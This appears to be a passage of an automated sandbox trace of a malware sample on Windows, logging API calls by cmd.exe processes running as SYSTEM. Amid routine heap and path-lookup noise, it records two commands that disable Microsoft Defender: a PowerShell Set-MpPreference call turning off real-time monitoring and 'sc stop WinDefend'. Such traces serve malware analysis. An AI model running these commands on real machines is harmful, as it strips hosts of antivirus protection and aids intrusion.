	[0084.867] _wcsicmp (_String1="powershell", _String2="RD") returned -2
	[0084.867] _wcsicmp (_String1="powershell", _String2="RMDIR") returned -2
	[0084.867] _wcsicmp (_String1="powershell", _String2="PATH") returned 14
	[0084.868] _wcsicmp (_String1="powershell", _String2="GOTO") returned 9
	[0084.868] _wcsicmp (_String1="powershell", _String2="SHIFT") returned -3
	[0084.868] _wcsicmp (_String1="powershell", _String2="CLS") returned 13
	[0084.868] _wcsicmp (_String1="powershell", _String2="CALL") returned 13
	[0084.868] _wcsicmp (_String1="powershell", _String2="VERIFY") returned -6
	[0084.868] _wcsicmp (_String1="powershell", _String2="VER") returned -6
	[0084.868] _wcsicmp (_String1="powershell", _String2="VOL") returned -6
	[0084.868] _wcsicmp (_String1="powershell", _String2="EXIT") returned 11
	[0084.868] _wcsicmp (_String1="powershell", _String2="SETLOCAL") returned -3
	[0084.868] _wcsicmp (_String1="powershell", _String2="ENDLOCAL") returned 11
	[0084.868] _wcsicmp (_String1="powershell", _String2="TITLE") returned -4
	[0084.868] _wcsicmp (_String1="powershell", _String2="START") returned -3
	[0084.868] _wcsicmp (_String1="powershell", _String2="DPATH") returned 12
	[0084.868] _wcsicmp (_String1="powershell", _String2="KEYS") returned 5
	[0084.868] _wcsicmp (_String1="powershell", _String2="MOVE") returned 3
	[0084.868] _wcsicmp (_String1="powershell", _String2="PUSHD") returned -6
	[0084.868] _wcsicmp (_String1="powershell", _String2="POPD") returned 7
	[0084.868] _wcsicmp (_String1="powershell", _String2="ASSOC") returned 15
	[0084.868] _wcsicmp (_String1="powershell", _String2="FTYPE") returned 10
	[0084.868] _wcsicmp (_String1="powershell", _String2="BREAK") returned 14
	[0084.868] _wcsicmp (_String1="powershell", _String2="COLOR") returned 13
	[0084.868] _wcsicmp (_String1="powershell", _String2="MKLINK") returned 3
	[0084.868] _wcsicmp (_String1="powershell", _String2="FOR") returned 10
	[0084.868] _wcsicmp (_String1="powershell", _String2="IF") returned 7
	[0084.868] _wcsicmp (_String1="powershell", _String2="REM") returned -2
	[0084.868] GetProcessHeap () returned 0x4c0000
	[0084.868] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x210) returned 0x4c0b70
	[0084.868] GetProcessHeap () returned 0x4c0000
	[0084.868] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x84) returned 0x4c0d88
	[0084.868] _wcsnicmp (_String1="powe", _String2="cmd ", _MaxCount=0x4) returned 13
	[0084.869] GetProcessHeap () returned 0x4c0000
	[0084.869] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x418) returned 0x4d1e30
	[0084.869] SetErrorMode (uMode=0x0) returned 0x0
	[0084.869] SetErrorMode (uMode=0x1) returned 0x0
	[0084.869] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4d1e38, lpFilePart=0x2df2f8 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x2df2f8*="system32") returned 0x13
	[0084.869] SetErrorMode (uMode=0x0) returned 0x1
	[0084.869] GetProcessHeap () returned 0x4c0000
	[0084.869] RtlReAllocateHeap (Heap=0x4c0000, Flags=0x0, Ptr=0x4d1e30, Size=0x46) returned 0x4d1e30
	[0084.869] GetProcessHeap () returned 0x4c0000
	[0084.869] RtlSizeHeap (HeapHandle=0x4c0000, Flags=0x0, MemoryPointer=0x4d1e30) returned 0x46
	[0084.869] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a5b0640, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87
	[0084.869] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0084.869] GetProcessHeap () returned 0x4c0000
	[0084.869] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x144) returned 0x4c0e18
	[0084.869] GetProcessHeap () returned 0x4c0000
	[0084.869] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x280) returned 0x4d1e80
	[0084.874] GetProcessHeap () returned 0x4c0000
	[0084.874] RtlReAllocateHeap (Heap=0x4c0000, Flags=0x0, Ptr=0x4d1e80, Size=0x146) returned 0x4d1e80
	[0084.874] GetProcessHeap () returned 0x4c0000
	[0084.874] RtlSizeHeap (HeapHandle=0x4c0000, Flags=0x0, MemoryPointer=0x4d1e80) returned 0x146
	[0084.874] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a5b0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0084.874] GetProcessHeap () returned 0x4c0000
	[0084.874] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0xe0) returned 0x4c0f68
	[0084.874] GetProcessHeap () returned 0x4c0000
	[0084.874] RtlReAllocateHeap (Heap=0x4c0000, Flags=0x0, Ptr=0x4c0f68, Size=0x76) returned 0x4c0f68
	[0084.874] GetProcessHeap () returned 0x4c0000
	[0084.874] RtlSizeHeap (HeapHandle=0x4c0000, Flags=0x0, MemoryPointer=0x4c0f68) returned 0x76
	[0084.875] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0084.875] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\powershell.*", fInfoLevelId=0x1, lpFindFileData=0x2df074, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2df074) returned 0xffffffff
	[0084.875] GetLastError () returned 0x2
	[0084.875] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\powershell", fInfoLevelId=0x1, lpFindFileData=0x2df074, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2df074) returned 0xffffffff
	[0084.876] GetLastError () returned 0x2
	[0084.876] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0084.876] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell.*", fInfoLevelId=0x1, lpFindFileData=0x2df074, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2df074) returned 0xffffffff
	[0084.876] GetLastError () returned 0x2
	[0084.876] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\powershell", fInfoLevelId=0x1, lpFindFileData=0x2df074, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2df074) returned 0xffffffff
	[0084.876] GetLastError () returned 0x2
	[0084.876] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0084.876] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\powershell.*", fInfoLevelId=0x1, lpFindFileData=0x2df074, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2df074) returned 0xffffffff
	[0084.876] GetLastError () returned 0x2
	[0084.876] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\powershell", fInfoLevelId=0x1, lpFindFileData=0x2df074, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2df074) returned 0xffffffff
	[0084.876] GetLastError () returned 0x2
	[0084.876] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0084.877] FindFirstFileExW (in: lpFileName="C:\\Windows\\powershell.*", fInfoLevelId=0x1, lpFindFileData=0x2df074, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2df074) returned 0xffffffff
	[0084.877] GetLastError () returned 0x2
	[0084.877] FindFirstFileExW (in: lpFileName="C:\\Windows\\powershell", fInfoLevelId=0x1, lpFindFileData=0x2df074, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2df074) returned 0xffffffff
	[0084.877] GetLastError () returned 0x2
	[0084.877] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0084.877] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.*", fInfoLevelId=0x1, lpFindFileData=0x2df074, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2df074) returned 0xffffffff
	[0084.877] GetLastError () returned 0x2
	[0084.877] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", fInfoLevelId=0x1, lpFindFileData=0x2df074, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2df074) returned 0xffffffff
	[0084.877] GetLastError () returned 0x2
	[0084.877] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0084.877] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.*", fInfoLevelId=0x1, lpFindFileData=0x2df074, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2df074) returned 0x4c0fe8
	[0084.878] GetProcessHeap () returned 0x4c0000
	[0084.878] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x14) returned 0x4c1028
	[0084.878] FindClose (in: hFindFile=0x4c0fe8 | out: hFindFile=0x4c0fe8) returned 1
	[0084.878] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", fInfoLevelId=0x1, lpFindFileData=0x2df074, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2df074) returned 0xffffffff
	[0084.878] GetLastError () returned 0x2
	[0084.878] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", fInfoLevelId=0x1, lpFindFileData=0x2df074, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2df074) returned 0x4c0fe8
	[0084.878] GetProcessHeap () returned 0x4c0000
	[0084.878] RtlReAllocateHeap (Heap=0x4c0000, Flags=0x0, Ptr=0x4c1028, Size=0x4) returned 0x4c1028
	[0084.878] FindClose (in: hFindFile=0x4c0fe8 | out: hFindFile=0x4c0fe8) returned 1
	[0084.878] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
	[0084.878] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
	[0084.878] GetConsoleTitleW (in: lpConsoleTitle=0x2df56c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0084.878] InitializeProcThreadAttributeList (in: lpAttributeList=0x2df3f4, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2df4bc | out: lpAttributeList=0x2df3f4, lpSize=0x2df4bc) returned 1
	[0084.878] UpdateProcThreadAttribute (in: lpAttributeList=0x2df3f4, dwFlags=0x0, Attribute=0x60001, lpValue=0x2df4b4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2df3f4, lpPreviousValue=0x0) returned 1
	[0084.878] GetStartupInfoW (in: lpStartupInfo=0x2df3b0 | out: lpStartupInfo=0x2df3b0*(cb=0x44, lpReserved="", lpDesktop="", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) 
	[0084.878] GetProcessHeap () returned 0x4c0000
	[0084.878] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x18) returned 0x4c0fe8
	[0084.879] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
	[0084.879] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
	[0084.879] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
	[0084.879] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0084.879] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
	[0084.879] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
	[0084.879] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3
	[0084.879] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
	[0084.879] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
	[0084.879] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
	[0084.879] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
	[0084.879] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
	[0084.879] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0084.879] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0084.879] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0084.879] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0084.879] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0084.879] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0084.879] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
	[0084.879] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
	[0084.879] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
	[0084.879] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
	[0084.879] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
	[0084.879] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
	[0084.879] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
	[0084.879] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0084.879] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
	[0084.879] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
	[0084.879] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
	[0084.879] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0084.879] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0084.879] GetProcessHeap () returned 0x4c0000
	[0084.879] HeapFree (in: hHeap=0x4c0000, dwFlags=0x0, lpMem=0x4c0fe8 | out: hHeap=0x4c0000) returned 1
	[0084.879] GetProcessHeap () returned 0x4c0000
	[0084.879] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0xa) returned 0x4cd580
	[0084.879] lstrcmpW (lpString1="\\powershell.exe", lpString2="\\XCOPY.EXE") returned -1
	[0084.881] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpCommandLine="powershell  Set-MpPreference -DisableRealtimeMonitoring $true", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x2df450*(cb=0x48, lpReserved=0x0, lpDesktop="", lpTitle="powershell  Set-MpPreference -DisableRealtimeMonitoring $true", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2df49c | out: lpCommandLine="powershell  Set-MpPreference -DisableRealtimeMonitoring $true", lpProcessInformation=0x2df49c*(hProcess=0x58, hThread=0x54, dwProcessId=0x3ac, dwThreadId=0x78c)) returned 1
	[0084.885] CloseHandle (hObject=0x54) returned 1
	[0084.885] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0084.885] GetProcessHeap () returned 0x4c0000
	[0084.885] HeapFree (in: hHeap=0x4c0000, dwFlags=0x0, lpMem=0x4d2fd0 | out: hHeap=0x4c0000) returned 1
	[0084.885] GetEnvironmentStringsW () returned 0x4d0238*
	[0084.885] GetProcessHeap () returned 0x4c0000
	[0084.885] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x8da) returned 0x4d2fd0
	[0084.885] FreeEnvironmentStringsW (penv=0x4d0238) returned 1
	[0084.885] WaitForSingleObject (hHandle=0x58, dwMilliseconds=0xffffffff) returned 0x0
	[0090.988] GetExitCodeProcess (in: hProcess=0x58, lpExitCode=0x2df390 | out: lpExitCode=0x2df390*=0x1) returned 1
	[0090.988] CloseHandle (hObject=0x58) returned 1
	[0090.988] _vsnwprintf (in: _Buffer=0x2df4d8, _BufferCount=0x13, _Format="%08X", _ArgList=0x2df39c | out: _Buffer="00000001") returned 8
	[0090.988] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1
	[0090.988] GetProcessHeap () returned 0x4c0000
	[0090.988] HeapFree (in: hHeap=0x4c0000, dwFlags=0x0, lpMem=0x4d2fd0 | out: hHeap=0x4c0000) returned 1
	[0090.988] GetEnvironmentStringsW () returned 0x4d22a0*
	[0090.988] GetProcessHeap () returned 0x4c0000
	[0090.988] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x900) returned 0x4d2ba8
	[0090.988] FreeEnvironmentStringsW (penv=0x4d22a0) returned 1
	[0090.988] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1
	[0090.989] GetProcessHeap () returned 0x4c0000
	[0090.989] HeapFree (in: hHeap=0x4c0000, dwFlags=0x0, lpMem=0x4d2ba8 | out: hHeap=0x4c0000) returned 1
	[0090.989] GetEnvironmentStringsW () returned 0x4d22a0*
	[0090.989] GetProcessHeap () returned 0x4c0000
	[0090.989] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x900) returned 0x4d2ba8
	[0090.989] FreeEnvironmentStringsW (penv=0x4d22a0) returned 1
	[0090.989] GetProcessHeap () returned 0x4c0000
	[0090.989] HeapFree (in: hHeap=0x4c0000, dwFlags=0x0, lpMem=0x4cd580 | out: hHeap=0x4c0000) returned 1
	[0090.989] DeleteProcThreadAttributeList (in: lpAttributeList=0x2df3f4 | out: lpAttributeList=0x2df3f4) 
	[0090.989] _get_osfhandle (_FileHandle=1) returned 0x7
	[0090.989] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
	[0090.989] _get_osfhandle (_FileHandle=1) returned 0x7
	[0090.989] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5a41ac | out: lpMode=0x4a5a41ac) returned 1
	[0090.989] _get_osfhandle (_FileHandle=0) returned 0x3
	[0090.989] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5a41b0 | out: lpMode=0x4a5a41b0) returned 1
	[0090.990] SetConsoleInputExeNameW () returned 0x1
	[0090.990] GetConsoleOutputCP () returned 0x1b5
	[0090.990] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a5a4260 | out: lpCPInfo=0x4a5a4260) returned 1
	[0090.990] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0090.990] exit (_Code=1) 

Process:
	id = "27"
	image_name = "cmd.exe"
	filename = "c:\\windows\\system32\\cmd.exe"
	page_root = "0x7ee17780"
	os_pid = "0x7dc"
	os_integrity_level = "0x4000"
	os_privileges = "0xe60b1e890"
	monitor_reason = "child_process"
	parent_id = "24"
	os_parent_pid = "0x214"
	cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c sc stop WinDefend"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "NT AUTHORITY\\SYSTEM"
	bitness = "64"
	os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000af54" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]


Thread:
	id = 136
	os_tid = 0x7d8

	[0084.918] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22fe64 | out: lpSystemTimeAsFileTime=0x22fe64*(dwLowDateTime=0x1c76ea00, dwHighDateTime=0x1d50a6a)) 
	[0084.918] GetCurrentProcessId () returned 0x7dc
	[0084.918] GetCurrentThreadId () returned 0x7d8
	[0084.918] GetTickCount () returned 0xa6d07b
	[0084.918] QueryPerformanceCounter (in: lpPerformanceCount=0x22fe5c | out: lpPerformanceCount=0x22fe5c*=15875622737) returned 1
	[0084.919] GetModuleHandleA (lpModuleName=0x0) returned 0x4a580000
	[0084.919] __set_app_type (_Type=0x1) 
	[0084.919] __p__fmode () returned 0x770231f4
	[0084.919] __p__commode () returned 0x770231fc
	[0084.919] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a5a21a6) returned 0x0
	[0084.919] __getmainargs (in: _Argc=0x4a5a4238, _Argv=0x4a5a4240, _Env=0x4a5a423c, _DoWildCard=0, _StartInfo=0x4a5a4140 | out: _Argc=0x4a5a4238, _Argv=0x4a5a4240, _Env=0x4a5a423c) returned 0
	[0084.919] GetCurrentThreadId () returned 0x7d8
	[0084.919] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x7d8) returned 0x38
	[0084.919] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76b10000
	[0084.919] GetProcAddress (hModule=0x76b10000, lpProcName="SetThreadUILanguage") returned 0x76b624c2
	[0084.919] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0084.919] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0084.919] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22fdf4 | out: phkResult=0x22fdf4*=0x0) returned 0x2
	[0084.919] VirtualQuery (in: lpAddress=0x22fe2b, lpBuffer=0x22fdc4, dwLength=0x1c | out: lpBuffer=0x22fdc4*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0084.919] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22fdc4, dwLength=0x1c | out: lpBuffer=0x22fdc4*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c
	[0084.920] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22fdc4, dwLength=0x1c | out: lpBuffer=0x22fdc4*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c
	[0084.920] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22fdc4, dwLength=0x1c | out: lpBuffer=0x22fdc4*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0084.920] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22fdc4, dwLength=0x1c | out: lpBuffer=0x22fdc4*(BaseAddress=0x230000, AllocationBase=0x230000, AllocationProtect=0x2, RegionSize=0x1000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c
	[0084.920] GetConsoleOutputCP () returned 0x1b5
	[0084.920] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a5a4260 | out: lpCPInfo=0x4a5a4260) returned 1
	[0084.920] SetConsoleCtrlHandler (HandlerRoutine=0x4a59e72a, Add=1) returned 1
	[0084.920] _get_osfhandle (_FileHandle=1) returned 0x7
	[0084.920] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1
	[0084.920] _get_osfhandle (_FileHandle=1) returned 0x7
	[0084.920] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5a41ac | out: lpMode=0x4a5a41ac) returned 1
	[0084.920] _get_osfhandle (_FileHandle=1) returned 0x7
	[0084.920] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
	[0084.920] _get_osfhandle (_FileHandle=0) returned 0x3
	[0084.920] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5a41b0 | out: lpMode=0x4a5a41b0) returned 1
	[0084.920] _get_osfhandle (_FileHandle=0) returned 0x3
	[0084.920] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x187) returned 1
	[0084.921] GetEnvironmentStringsW () returned 0x3e01a8*
	[0084.921] GetProcessHeap () returned 0x3d0000
	[0084.921] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x892) returned 0x3e0a48
	[0084.921] FreeEnvironmentStringsW (penv=0x3e01a8) returned 1
	[0084.921] GetProcessHeap () returned 0x3d0000
	[0084.921] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x4) returned 0x3e0028
	[0084.921] GetEnvironmentStringsW () returned 0x3e01a8*
	[0084.921] GetProcessHeap () returned 0x3d0000
	[0084.921] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x8, Size=0x892) returned 0x3e12e8
	[0084.921] FreeEnvironmentStringsW (penv=0x3e01a8) returned 1
	[0084.921] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ed64 | out: phkResult=0x22ed64*=0x40) returned 0x0
	[0084.921] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ed6c, lpData=0x22ed70, lpcbData=0x22ed68*=0x1000 | out: lpType=0x22ed6c*=0x0, lpData=0x22ed70*=0xd0, lpcbData=0x22ed68*=0x1000) returned 0x2
	[0084.921] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ed6c, lpData=0x22ed70, lpcbData=0x22ed68*=0x1000 | out: lpType=0x22ed6c*=0x4, lpData=0x22ed70*=0x1, lpcbData=0x22ed68*=0x4) returned 0x0
	[0084.921] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ed6c, lpData=0x22ed70, lpcbData=0x22ed68*=0x1000 | out: lpType=0x22ed6c*=0x0, lpData=0x22ed70*=0x1, lpcbData=0x22ed68*=0x1000) returned 0x2
	[0084.921] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ed6c, lpData=0x22ed70, lpcbData=0x22ed68*=0x1000 | out: lpType=0x22ed6c*=0x4, lpData=0x22ed70*=0x0, lpcbData=0x22ed68*=0x4) returned 0x0
	[0084.921] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ed6c, lpData=0x22ed70, lpcbData=0x22ed68*=0x1000 | out: lpType=0x22ed6c*=0x4, lpData=0x22ed70*=0x40, lpcbData=0x22ed68*=0x4) returned 0x0
	[0084.921] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ed6c, lpData=0x22ed70, lpcbData=0x22ed68*=0x1000 | out: lpType=0x22ed6c*=0x4, lpData=0x22ed70*=0x40, lpcbData=0x22ed68*=0x4) returned 0x0
	[0084.921] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ed6c, lpData=0x22ed70, lpcbData=0x22ed68*=0x1000 | out: lpType=0x22ed6c*=0x0, lpData=0x22ed70*=0x40, lpcbData=0x22ed68*=0x1000) returned 0x2
